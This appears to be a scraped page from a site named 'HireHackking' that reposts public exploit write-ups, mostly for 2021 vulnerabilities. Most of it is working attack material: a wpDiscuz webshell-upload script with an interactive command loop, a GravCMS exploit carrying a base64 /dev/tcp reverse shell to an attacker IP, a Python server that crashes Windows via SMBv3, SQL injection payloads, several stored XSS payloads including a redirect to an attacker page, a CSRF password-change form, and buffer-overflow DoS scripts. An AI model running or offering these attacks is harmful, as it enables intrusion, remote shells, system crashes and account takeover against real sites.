    # Exploit Title: WordPress Plugin wpDiscuz 7.0.4 - Remote Code Execution (Unauthenticated) # Date: 2021/06/08 # Exploit Author: Fellipe Oliveira # Vendor Homepage: https://gvectors.com/ # Software Link: https://downloads.wordpress.org/plugin/wpdiscuz.7.0.4.zip # Version: wpDiscuz 7.0.4 # Tested on: Debian9, Windows 7, Windows 10 (Wordpress 5.7.2) # CVE : CVE-2020-24186 # Thanks for the great contribution to the code: Z3roC00l (https://twitter.com/zeroc00I) #!/bin/python3 import requests import optparse import re import random import time import string import json parser = optparse.OptionParser() parser.add_option('-u', '--url', action="store", dest="url", help="Base target host: http://192.168.1.81/blog") parser.add_option('-p', '--path', action="store", dest="path", help="Path to exploitation: /2021/06/blogpost") options, args = parser.parse_args() if not options.url or not options.path: print('[+] Specify an url target') print('[+] Example usage: exploit.py -u http://192.168.1.81/blog -p /wordpress/2021/06/blogpost') print('[+] Example help usage: exploit.py -h') exit() session = requests.Session() main_url = options.url path = options.path url_blog = main_url + path clean_host = main_url.replace('http://', '').replace('/wordpress','') def banner(): print('---------------------------------------------------------------') print('[-] Wordpress Plugin wpDiscuz 7.0.4 - Remote Code Execution') print('[-] File Upload Bypass Vulnerability - PHP Webshell Upload') print('[-] CVE: CVE-2020-24186') print('[-] https://github.com/hevox') print('--------------------------------------------------------------- \n') def csrfRequest(): global wmuSec global wc_post_id try: get_html = session.get(url_blog) response_len = str(len(get_html.text)) response_code = str(get_html.status_code) print('[+] Response length:['+response_len+'] | code:['+response_code+']') raw_wmu = get_html.text.replace(',','\n') wmuSec = re.findall('wmuSecurity.*$',raw_wmu,re.MULTILINE)[0].split('"')[2] print('[!] Got wmuSecurity value: '+ wmuSec +'') raw_postID = get_html.text.replace(',','\n') wc_post_id = re.findall('wc_post_id.*$',raw_postID,re.MULTILINE)[0].split('"')[2] print('[!] Got wmuSecurity value: '+ wc_post_id +' \n') except requests.exceptions.ConnectionError as err: print('\n[x] Failed to Connect in: '+url_blog+' ') print('[x] This host seems to be Down') exit() def nameRandom(): global shell_name print('[+] Generating random name for Webshell...') shell_name = ''.join((random.choice(string.ascii_lowercase) for x in range(15))) time.sleep(1) print('[!] Generated webshell name: '+shell_name+'\n') return shell_name def shell_upload(): global shell print('[!] Trying to Upload Webshell..') try: upload_url = main_url + "/wp-admin/admin-ajax.php" upload_cookies = {"wordpress_test_cookie": "WP%20Cookie%20check", "wpdiscuz_hide_bubble_hint": "1"} upload_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "*/*", "Accept-Language": "pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate", "X-Requested-With": "XMLHttpRequest", "Content-Type": "multipart/form-data; boundary=---------------------------2032192841253859011643762941", "Origin": "http://"+clean_host+"", "Connection": "close", "Referer": url_blog} upload_data = "-----------------------------2032192841253859011643762941\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\nwmuUploadFiles\r\n-----------------------------2032192841253859011643762941\r\nContent-Disposition: form-data; name=\"wmu_nonce\"\r\n\r\n"+wmuSec+"\r\n-----------------------------2032192841253859011643762941\r\nContent-Disposition: form-data; name=\"wmuAttachmentsData\"\r\n\r\n\r\n-----------------------------2032192841253859011643762941\r\nContent-Disposition: form-data; name=\"wmu_files[0]\"; filename=\""+shell_name+".php\"\r\nContent-Type: image/png\r\n\r\nGIF689a;\r\n\r\n<?php system($_GET['cmd']); ?>\r\n\x1a\x82\r\n-----------------------------2032192841253859011643762941\r\nContent-Disposition: form-data; name=\"postId\"\r\n\r\n"+wc_post_id+"\r\n-----------------------------2032192841253859011643762941--\r\n" check = session.post(upload_url, headers=upload_headers, cookies=upload_cookies, data=upload_data) json_object = (json.loads(check.text)) status = (json_object["success"]) get_path = (check.text.replace(',','\n')) shell_pret = re.findall('url.*$',get_path,re.MULTILINE) find_shell = str(shell_pret) raw = (find_shell.replace('\\','').replace('url":"','').replace('\',','').replace('"','').replace('[\'','')) shell = (raw.split(" ",1)[0]) if status == True: print('[+] Upload Success... Webshell path:' +shell+' \n') else: print('[x] Failed to Upload Webshell in: '+ url_blog +' ') exit() except requests.exceptions.HTTPError as conn: print('[x] Failed to Upload Webshell in: '+ url_blog +' ') return shell def code_exec(): try: while True: cmd = input('> ') codex = session.get(shell + '?cmd='+cmd+'') print(codex.text.replace('GIF689a;','').replace('�','')) except: print('\n[x] Failed to execute PHP code...') banner() csrfRequest() nameRandom() shell_upload() code_exec()
  14. HireHackking

    Backup Key Recovery 2.2.7 - Denial of Service (PoC)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Backup Key Recovery 2.2.7 - Denial of Service (PoC) # Date: 07/06/2021 # Author: Erick Galindo # Vendor Homepage: http://www.nsauditor.com # Software http://www.nsauditor.com/downloads/backeyrecovery_setup.exe # Version: 2.2.7.0 # Tested on: Windows 10 Pro x64 es # Proof of Concept: #1.- Copy printed "AAAAA..." string to clipboard! #2.- Open BackupKeyRecovery.exe #3.- Go to Register > Enter Registration Code... #4.- Write anything in 'Name' field #5.- Paste clipboard in 'Key' field #6.- Click on button -> Ok buffer = "\x41" * 256 f = open ("poc.txt", "w") f.write(buffer) f.close()
  15. HireHackking

    OpenCart 3.0.3.6 - 'subject' Stored Cross-Site Scripting

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: OpenCart 3.0.3.6 - 'subject' Stored Cross-Site Scripting # Date: 2021/08/06 # Exploit Author: Mert Daş # Vendor Homepage: https://www.opencart.com/ # Software Link: https://www.opencart.com/index.php?route=cms/download # Version: 3.0.3.7 # Tested on: Windows 10 Stored Cross-site scripting(XSS): Stored XSS, also known as persistent XSS, is the more damaging of the two. It occurs when a malicious script is injected directly into a vulnerable web application. Attack vector: This vulnerability can results attacker to inject the XSS payload in Subject field of the mail and each time any user will open that mail of the website, the XSS triggers and attacker can able to steal the cookie according to the crafted payload. Vulnerable Parameters: Subject of mail. Steps-To-Reproduce: 1. Go to the opencart admin page. 2. Now go to the Marketing-Mail option. 3. Put the below payload in subject field of the Mail : "<script>alert(11111)</script>" 5. Now click on send button. 6. The XSS will be triggered. POST /opencart/admin/index.php?route=marketing/contact/send&user_token=xdMb2w0inuUPADXGigfCtsIMM0RgQ83t HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 187 Origin: http://127.0.0.1 Connection: close Referer: http://127.0.0.1/opencart/admin/index.php?route=marketing/contact&user_token=xdMb2w0inuUPADXGigfCtsIMM0RgQ83t Cookie: language=en-gb; currency=EUR; OCSESSID=b21a152616460d44029878c9a0 store_id=0&to=customer_all&customer_group_id=1&customers=&affiliates=&products=&subject=%3Cscript%3Ealert(1)%3C%2Fscript%3E&message=&=&=&=http%3A%2F%2F&=on&files=&=&=&=&=&file=&=&=&=_self
  16. HireHackking

    OpenCart 3.0.3.7 - 'Change Password' Cross-Site Request Forgery (CSRF)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title : OpenCart 3.0.3.7 - 'Change Password' Cross-Site Request Forgery (CSRF) # Date : 2021/08/06 # Exploit Author : Mert Daş merterpreter@gmail.com # Software Link : http://www.opencart.com/index.php?route=download/download : https://github.com/opencart # Software web : www.opencart.com # Tested on: Server : Xampp # Cross-site request forgery OpenCart is an open source shoping cart system , suffers from Cross-site request forgery through which attacker can manipulate user data via sending him malicious craft url. OpenCart is not using any security token to prevent it against CSRF. It is vulnerable to all location inside User panel. Header ---------------------------------------------------------- http://localhost/index.php?route=account/password POST /opencart/index.php?route=account/password HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------3890527419799841332130342675 Content-Length: 300 Origin: http://127.0.0.1 Connection: close Referer: http://127.0.0.1/opencart/index.php?route=account/password Cookie: language=en-gb; currency=EUR; OCSESSID=b21a152616460d44029878c9a0 Upgrade-Insecure-Requests: 1 -----------------------------3890527419799841332130342675 Content-Disposition: form-data; name="password" 123asd! -----------------------------3890527419799841332130342675 Content-Disposition: form-data; name="confirm" 123asd! -----------------------------3890527419799841332130342675-- Response HTTP/1.1 302 Found Date: Tue, 08 Jun 2021 16:52:59 GMT Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.4.20 X-Powered-By: PHP/7.4.20 Set-Cookie: OCSESSID=b21a152616460d44029878c9a0; path=/ Location: http://127.0.0.1/opencart/index.php?route=account/account Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 ---------------------------------------------------------- Simple Poc to change user Password <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState('', '', '/')</script> <form action="http://127.0.0.1/opencart/index.php?route=account/password" method="POST" enctype="multipart/form-data"> <input type="hidden" name="password" value="1234asd!" /> <input type="hidden" name="confirm" value="1234asd!" /> <input type="submit" value="Submit request" /> </form> </body> </html>
  17. HireHackking

    Student Result Management System 1.0 - 'class' SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Student Result Management System 1.0 - 'class' SQL Injection # Date: 09.09.2020 # Exploit Author: Riadh Benlamine (rbn0x00) # Vendor Homepage : https://projectworlds.in # Software Page: https://projectworlds.in/free-projects/php-projects/student-result-management-system-project-in-php/ # Version: 1.0 # Category: Webapps # Tested on: Apache2+MariaDB latest version # Description : student.php is prone to an SQL-injection vulnerability because it fails to sanitize user input before pushing it into SQL query.Exploiting this issue could allow the attacker to compromise the server. The vulnerable parameter uri: /srms/student.php?class=<injection point> exploit: Parameter: class (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: class=-6346' OR 3657=3657#&rn=1 Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: class=1' OR (SELECT 3201 FROM(SELECT COUNT(*),CONCAT(0x71786a7171,(SELECT (ELT(3201=3201,1))),0x71766b7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- hNXT&rn=1 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: class=1' AND (SELECT 1049 FROM (SELECT(SLEEP(5)))gIdB)-- yYYR&rn=1 Type: UNION query Title: MySQL UNION query (random number) - 7 columns Payload: class=1' UNION ALL SELECT 8674,8674,8674,CONCAT(0x71786a7171,0x45414967666b57777145704f476d6566766d6f694d707561566e6150744d73505370466e7a6c784c,0x71766b7a71),8674,8674,8674#&rn=1
  18. HireHackking

    TextPattern CMS 4.8.7 - Stored Cross-Site Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: TextPattern CMS 4.8.7 - Stored Cross-Site Scripting (XSS) # Date: 2021/09/06 # Exploit Author: Mert Daş merterpreter@gmail.com # Software Link: https://textpattern.com/file_download/113/textpattern-4.8.7.zip # Software web: https://textpattern.com/ # Tested on: Server: Xampp TextPattern is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. TextPattern 4.8.7 is vulnerable; other versions may also be affected. Header -POST /textpattern/textpattern/index.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------1356274838636633083297009973 Content-Length: 4574 Origin: http://localhost Connection: close Referer: http://localhost/textpattern/textpattern/index.php?event=article&ID=2%27 Cookie: txp_login=admin%2C4c96cd31447df40aa2ceea6e052132b6; txp_login_public=895102db7badmin; language=en-gb; currency=USD; PHPSESSID=280d77vpc9brntkqclej5her85 -----------------------------1356274838636633083297009973 Content-Disposition: form-data; name="ID" 2 -----------------------------1356274838636633083297009973 Content-Disposition: form-data; name="event" article -----------------------------1356274838636633083297009973 Content-Disposition: form-data; name="step" edit -----------------------------1356274838636633083297009973 Content-Disposition: form-data; name="sPosted" 1623260284 -----------------------------1356274838636633083297009973 Content-Disposition: form-data; name="sLastMod" 1623260295 -----------------------------1356274838636633083297009973 Content-Disposition: form-data; name="AuthorID" admin -----------------------------1356274838636633083297009973 Content-Disposition: form-data; name="LastModID" admin -----------------------------1356274838636633083297009973 Content-Disposition: form-data; name="Title" "><img src=1 onerror=alert(1)> -----------------------------1356274838636633083297009973 Content-Disposition: form-data; name="textile_body" 1 -----------------------------1356274838636633083297009973 Content-Disposition: form-data; name="Body" "><img src=1 onerror=alert(1)> -----------------------------1356274838636633083297009973 Content-Disposition: form-data; name="textile_excerpt" 1 -----------------------------1356274838636633083297009973 Content-Disposition: form-data; name="Excerpt" -----------------------------1356274838636633083297009973 Content-Disposition: form-data; name="Status" 4 -----------------------------1356274838636633083297009973 Content-Disposition: form-data; name="Section" articles -----------------------------1356274838636633083297009973 Content-Disposition: form-data; name="override_form" -----------------------------1356274838636633083297009973 Content-Disposition: form-data; name="year" 2021 -----------------------------1356274838636633083297009973 Content-Disposition: form-data; name="month" 06 -----------------------------1356274838636633083297009973 Content-Disposition: form-data; name="day" 09 -----------------------------1356274838636633083297009973 Content-Disposition: form-data; name="hour" 19 -----------------------------1356274838636633083297009973 Content-Disposition: form-data; name="minute" 38 -----------------------------1356274838636633083297009973 Content-Disposition: form-data; name="second" 04 -----------------------------1356274838636633083297009973 Content-Disposition: form-data; name="exp_year" -----------------------------1356274838636633083297009973 Content-Disposition: form-data; name="exp_month" -----------------------------1356274838636633083297009973 Content-Disposition: form-data; name="exp_day" -----------------------------1356274838636633083297009973 Content-Disposition: form-data; name="exp_hour" -----------------------------1356274838636633083297009973 Content-Disposition: form-data; name="exp_minute" -----------------------------1356274838636633083297009973 Content-Disposition: form-data; name="exp_second" -----------------------------1356274838636633083297009973 Content-Disposition: form-data; name="sExpires" -----------------------------1356274838636633083297009973 Content-Disposition: form-data; name="Category1" -----------------------------1356274838636633083297009973 Content-Disposition: form-data; name="Category2" -----------------------------1356274838636633083297009973 Content-Disposition: form-data; name="url_title" -----------------------------1356274838636633083297009973 Content-Disposition: form-data; name="description" -----------------------------1356274838636633083297009973 Content-Disposition: form-data; name="Keywords" -----------------------------1356274838636633083297009973 Content-Disposition: form-data; name="Image" -----------------------------1356274838636633083297009973 Content-Disposition: form-data; name="custom_1" -----------------------------1356274838636633083297009973 Content-Disposition: form-data; name="custom_2" -----------------------------1356274838636633083297009973 Content-Disposition: form-data; name="save" Save -----------------------------1356274838636633083297009973 Content-Disposition: form-data; name="app_mode" async -----------------------------1356274838636633083297009973 Content-Disposition: form-data; name="_txp_token" 346eeab2db04acf953d13529f6be3a74 -----------------------------1356274838636633083297009973--
  19. HireHackking

    GravCMS 1.10.7 - Arbitrary YAML Write/Update (Unauthenticated) (2)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: GravCMS 1.10.7 - Arbitrary YAML Write/Update (Unauthenticated) (2) # Original Exploit Author: Mehmet Ince # Vendor Homepage: https://getgrav.org # Version: 1.10.7 # Tested on: Debian 10 # Author: legend #/usr/bin/python3 import requests import sys import re import base64 target= "http://192.168.1.2" #Change base64 encoded value with with below command. #echo -ne "bash -i >& /dev/tcp/192.168.1.3/4444 0>&1" | base64 -w0 payload=b"""/*<?php /**/ file_put_contents('/tmp/rev.sh',base64_decode('YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMy80NDQ0IDA+JjE='));chmod('/tmp/rev.sh',0755);system('bash /tmp/rev.sh'); """ s = requests.Session() r = s.get(target+"/admin") adminNonce = re.search(r'admin-nonce" value="(.*)"',r.text).group(1) if adminNonce != "" : url = target + "/admin/tools/scheduler" data = "admin-nonce="+adminNonce data +='&task=SaveDefault&data%5bcustom_jobs%5d%5bncefs%5d%5bcommand%5d=/usr/bin/php&data%5bcustom_jobs%5d%5bncefs%5d%5bargs%5d=-r%20eval%28base64_decode%28%22'+base64.b64encode(payload).decode('utf-8')+'%22%29%29%3b&data%5bcustom_jobs%5d%5bncefs%5d%5bat%5d=%2a%20%2a%20%2a%20%2a%20%2a&data%5bcustom_jobs%5d%5bncefs%5d%5boutput%5d=&data%5bstatus%5d%5bncefs%5d=enabled&data%5bcustom_jobs%5d%5bncefs%5d%5boutput_mode%5d=append' headers = {'Content-Type': 'application/x-www-form-urlencoded'} r = s.post(target+"/admin/config/scheduler",data=data,headers=headers)
  20. HireHackking

    タイトル:SMBV3 NULLポインターリファレンスDOS脆弱性再帰

    HireHackking posted a blog entry in Hacker Technology
    0x01序文 昨年末、SMBプロトコルを見つけるためにエミュレータが設定されたとき、大企業に対するこのような単純で非常に効果的な攻撃が発見されたことが脆弱性が発見されました。 TL; DR:サービスの拒否エラーにより、BSODプロトコルはWindows 8.1およびWindows Server 2012 R2コンピューターに単一のパケットを送信できます。 0x02テスト環境 影響を受けるシステム: ・Windows8.1(x86) ・Windows Server 2012 R2(x64) 0x03背景知識 この脆弱性の根本原因を理解するには、SMBパケットがどのように構造化されているかを理解する必要があります。 SMBV1プロトコルヘッダーファイルを見てみましょう。 プロトコルフィールドがFFバイトから始まるのを見たように、SMBV2を見てみましょう プロトコルフィールドは現在、FEバイトから始まるので、SMBV3はどうですか? SMBプロトコルのV3バージョンは既に暗号化されており、暗号化された通信にSMB2_Transformの特定のヘッダーを使用します。 SMBV3セッションの交渉はSMBV2セッションから始まることを公式ドキュメントで学ぶことができるため、SMBV3は常に暗号化されています。 SMBV3セッションをセットアップするときに関係するパケットは次のとおりです。 1〜8バイトのパケットで、SMBヘッダーは次のようになります。 使用されるバイトシーケンスはまだ0xfeであり、これは公式のMicrosoftドキュメントに示されているSMBV2のコードであることがわかります。 バイト9から始まると、暗号化は接続された状態にあり、ヘッダーで使用されるバイトシーケンスは0xfd になります POCでわかるように、最初のセッション中に0xFDヘッダーを備えたSMBパケットがすぐに送信されると、カーネルのクラッシュが発生します。さて、このクラッシュの根本原因を理解するために、クラッシュダンプメカニズムを掘り下げましょう。 0x04ルール原因分析 Windows 8.1(x86)でのみ実行されて根本原因を分析すると、特定のパケットを送信すると、アドレス0x00000030で保護された値(空のページ保護)をメモリから読み取るため、カーネルがクラッシュします。 クラッシュするモジュールは「MRXSMB.SYS」です。これは、Microsoft Server Message Block(SMB)のResizerです。クラッシュの正確な位置はMRXSMBです! SMBWKSRECEIVEEVENT + 8539。[ECX + 30H]からEAXへのオフセットで、ECXの値は0x00000000を指します。 IDAを通るフローを分析するとき、それは次のようになります。パケットを処理し、暗号化が有効になっているかどうかを確認します。 3.0関連 Windbgでは、次のように見えます。 基本的に、暗号化が有効になっているかどうかを確認します。この場合、「エラー」パスに従い、次の関数に移動します。 いくつかの比較手順を実行し、2番目の最後の命令は、ECXがHEX値0x34に登録されているかどうかを確認することです。 ECXが0x34以下の場合、この場合にエラーが発生します。 「エラー」パスに従って:別の命令が発生します。その場合、レジスタEDX(攻撃者の制御可能な値)が[ESP+4C]の値よりも高い場合、「実際の」パスに従います。 さまざまなレジスタの値: 次の命令では、ECXの値を再び0x34に比較します。ECXが0x34よりも高い場合、「実際の」パスに従います この場合、ECXの値は0x34よりも高いため、実際のパスに従います。次の命令ブロックでは、_MICROSOFT_WINDOWS_SMBCLIENTENABLEBITS '値0x80000000の間の値をテストします。 Windbgでは、テストが「エラー」になることがわかります。これにより、「エラー」パスに従います。 常に「真」であるテスト指示を受け入れるように導く loca0f20e05関数を使用する代わりに、ゼロをスタックの後ろに置きます。その場合、 "loca0f20e15"を実行します。ECX + 30HをEAXに移動する命令で、ECXが0x000000000であるためにクラッシュが発生します。 これにより、カーネルがクラッシュし、マシンの再起動を強制します。 0x05 POC を使用します Import SocketServer binasciiからインポートUnexlifyから ペイロード='000000ECFD534D424141414141414141414141414141414141414141414 141414141414141414141414141414141414141414141414141414141414 141414141414141414141414141414141414141414141414141414141414 1414141414141414141414141414141414141414141414141414141414141 414141414141414141414141414141414141414141414141414141414141 414141414141414141414141414141414141414141414141414141414141 414141414141414141414141414141414141414141414141414141414141 414141414141414141414141414141414141414141414141414141414141 '' Class Byebye(socketserver.baserequesthandler): defハンドル(自己): try: 'from:'、self.client_addressを印刷します 印刷'[*]ペイロードの送信.' self.request.send(unsexlify(ペイロード)) 例外を除く: 印刷「BSODトリガーオン」、self.client_address 合格 socketserver.tcpserver.allow_reuse_address=1 起動=socketserver.tcpserver(( ''、445)、byebye) launch.serve_forever() 0x06脆弱性の再発 1。KALIでスクリプトを実行します 2.次に、Windows 2012 R2で共有アドレス: \\ 10.0.0.217にアクセスすると、すぐにオペレーティングシステムのブルースクリーンが表示されます。
  21. HireHackking

    WordPress Plugin visitors-app 0.3 - 'user-agent' Stored Cross-Site Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: WordPress Plugin visitors-app 0.3 - 'user-agent' Stored Cross-Site Scripting (XSS) # Date: 09/06/2021 # Exploit Author: Mesut Cetin # Vendor Homepage: https://profiles.wordpress.org/domingoruiz/ # Software Link: https://wordpress.org/plugins/visitors-app/ # Version: 0.3 # Tested on: Debian GNU/Linux 10 # Reference: https://wpscan.com/vulnerability/06f1889d-8e2f-481a-b91b-3a8008e00ffc ## Description: # A vulnerability in the Wordpress plugin "visitors" version 0.3 and prior allows remote attacker through # Cross-Site Scripting (XSS) to redirect administrators and visitors and potentially obtain sensitive informations # The 'user-agent' parameter allows attacker to escalate their privileges. ## PoC # Replace google.com with malicious attacker page curl -i http://localhost/wordpress --user-agent "</script><script>location=([]+/http:\\google.com/g).substr(1,19); </script>" # on http://localhost/wordpress/wp-admin, browse the tab "visitors"
  22. HireHackking

    memono Notepad Version 4.2 - Denial of Service (PoC)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: memono Notepad Version 4.2 - Denial of Service (PoC) # Date: 06-09-2021 # Author: Geovanni Ruiz # Download Link: https://apps.apple.com/es/app/memono-bloc-de-notas/id906470619 # Version: 4.2 # Category: DoS (iOS) ##### Vulnerability ##### Color Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note: # STEPS # # Open the program. # Create a new Note. # Run the python exploit script payload.py, it will create a new payload.txt file # Copy the content of the file "payload.txt" # Paste the content from payload.txt twice in the new Note. # Crashed Successful exploitation will cause the application to stop working. I have been able to test this exploit against iOS 14.2. ##### PoC ##### --> payload.py <-- #!/usr/bin/env python buffer = "\x41" * 350000 try: f = open("payload.txt","w") f.write(buffer) f.close() print ("File created") except: print ("File cannot be created")
  23. HireHackking

    Sticky Notes Widget Version 3.0.6 - Denial of Service (PoC)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Sticky Notes Widget Version 3.0.6 - Denial of Service (PoC) # Date: 06-07-2021 # Author: Geovanni Ruiz # Download Link: https://apps.apple.com/us/app/sticky-notes-widget/id1499269608 # Version: 3.0.6 # Category: DoS (iOS) ##### Vulnerability ##### Color Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note: # STEPS # # Open the program. # Create a new Note. # Run the python exploit script payload.py, it will create a new payload.txt file # Copy the content of the file "payload.txt" # Paste the content from payload.txt twice in the new Note. # Crashed Successful exploitation will cause the application to stop working. I have been able to test this exploit against iOS 14.2. ##### PoC ##### --> payload.py <-- #!/usr/bin/env python buffer = "\x41" * 350000 try: f = open("payload.txt","w") f.write(buffer) f.close() print ("File created") except: print ("File cannot be created")
  24. HireHackking

    Cerberus FTP Web Service 11 - 'svg' Stored Cross-Site Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Cerberus FTP web Service 11 - 'svg' Stored Cross-Site Scripting (XSS) # Date: 08/06/2021 # Exploit Author: Mohammad Hossein Kaviyany # Vendor Homepage: www.cerberusftp.com # Software Link: https://www.cerberusftp.com/download/ # Version:11.0 releases prior to 11.0.4, 10.0 releases prior to 10.0.19, 9.0 and earlier # Tested on: windows server 2016 # CVE: CVE-2019-25046 ------------ About Cerberus FTP Server (From Vendor Site) : Cerberus FTP Server is a secure Windows file server with FTP, FTPS, SFTP, HTTPS, FIPS 140-2 validated, and Active Directory and LDAP authentication. -------------------------------------------------------- Exploit Detailes : This stored XSS bug happens when a user uploads an svg file with the following content : <svg xmlns="http://www.w3.org/2000/svg" onload="alert(123)"/> Exploit POC : # Vulnerable Path : /file/upload # Parameter: files (POST) # Vector: <svg xmlns="http://www.w3.org/2000/svg" onload="alert(123)"/> #Payload: POST /file/upload HTTP/1.1 Host: target.com Connection: close Content-Length: 484 sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Google Chrome";v="90" Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAAM6ZtOAsyklo6JG Origin: https://target.com Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://target.com/file/d/home/ Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: cftpSID=U02_5UCTumW3vFtt5PrlWwoD4k9ccxW0A87oCM8-jsM ------WebKitFormBoundaryAAM6ZtOAsyklo6JG Content-Disposition: form-data; name="cd" /home ------WebKitFormBoundaryAAM6ZtOAsyklo6JG Content-Disposition: form-data; name="csrftoken" z-Zlffq0sPaJErxOsMgL4ITcW1x3AuZo3XlZRP5GcKg ------WebKitFormBoundaryAAM6ZtOAsyklo6JG Content-Disposition: form-data; name="files[]"; filename="file.svg" Content-Type: image/svg+xml <svg xmlns="http://www.w3.org/2000/svg" onload="alert(123)"/> ------WebKitFormBoundaryAAM6ZtOAsyklo6JG-- --------------------------
  25. HireHackking

    Accela Civic Platform 21.1 - 'servProvCode' Cross-Site-Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Accela Civic Platform 21.1 - 'servProvCode' Cross-Site-Scripting (XSS) # Exploit Author: Abdulazeez Alaseeri # Software Link: https://www.accela.com/civic-platform/ # Version: <= 21.1 # Tested on: JBoss server/windows # Type: Web App # Date: 06/07/2021 # CVE: CVE-2021-33904 ================================================================ Accela Civic Platform Cross-Site-Scripting <= 21.1 ================================================================ ================================================================ Request Heeaders start ================================================================ GET /security/hostSignon.do?hostSignOn=true&servProvCode=k3woq%22%5econfirm(1)%5e%22a2pbrnzx5a9 HTTP/1.1 Host: Hidden for security reasons Cookie: JSESSIONID=FBjC0Zfg-H87ecWmTMDEcNo8HID1gB6rwBt5QC4Y.civpnode; LASTEST_REQUEST_TIME=1623004368673; g_current_language_ext=en_US; hostSignOn=true; BIGipServerAccela_Automation_av.web_pool_PROD=1360578058.47873.0000; LATEST_SESSION_ID=lVkV3izKpk9ig1g_nqSktJ3YKjSbfwwdPj0YBFDO; LATEST_WEB_SERVER=1.1.1.1; LATEST_LB=1360578058.47873.0000 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Upgrade-Insecure-Requests: 1 Te: trailers Connection: close ================================================================ Request Heeaders end ================================================================ ================================================================ Response Heeaders start ================================================================ HTTP/1.1 200 OK Expires: Wed, 31 Dec 1969 23:59:59 GMT Cache-Control: no-cache X-Powered-By: JSP/2.3 Set-Cookie: LASTEST_REQUEST_TIME=1623004478373; path=/; domain=.Hidden for security reasons; secure Set-Cookie: g_current_language_ext=en_US; path=/; domain=.Hidden for security reasons; secure Set-Cookie: hostSignOn=true; path=/; domain=.Hidden for security reasons; secure X-XSS-Protection: 0 Pragma: No-cache Date: Sun, 06 Jun 2021 18:34:38 GMT Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 13222 ================================================================ Response Heeaders end ================================================================ You can notice that the parameter "servProvCode" is vulnerable to XSS. Payload: k3woq%22%5econfirm(1)%5e%22a2pbrnzx5a9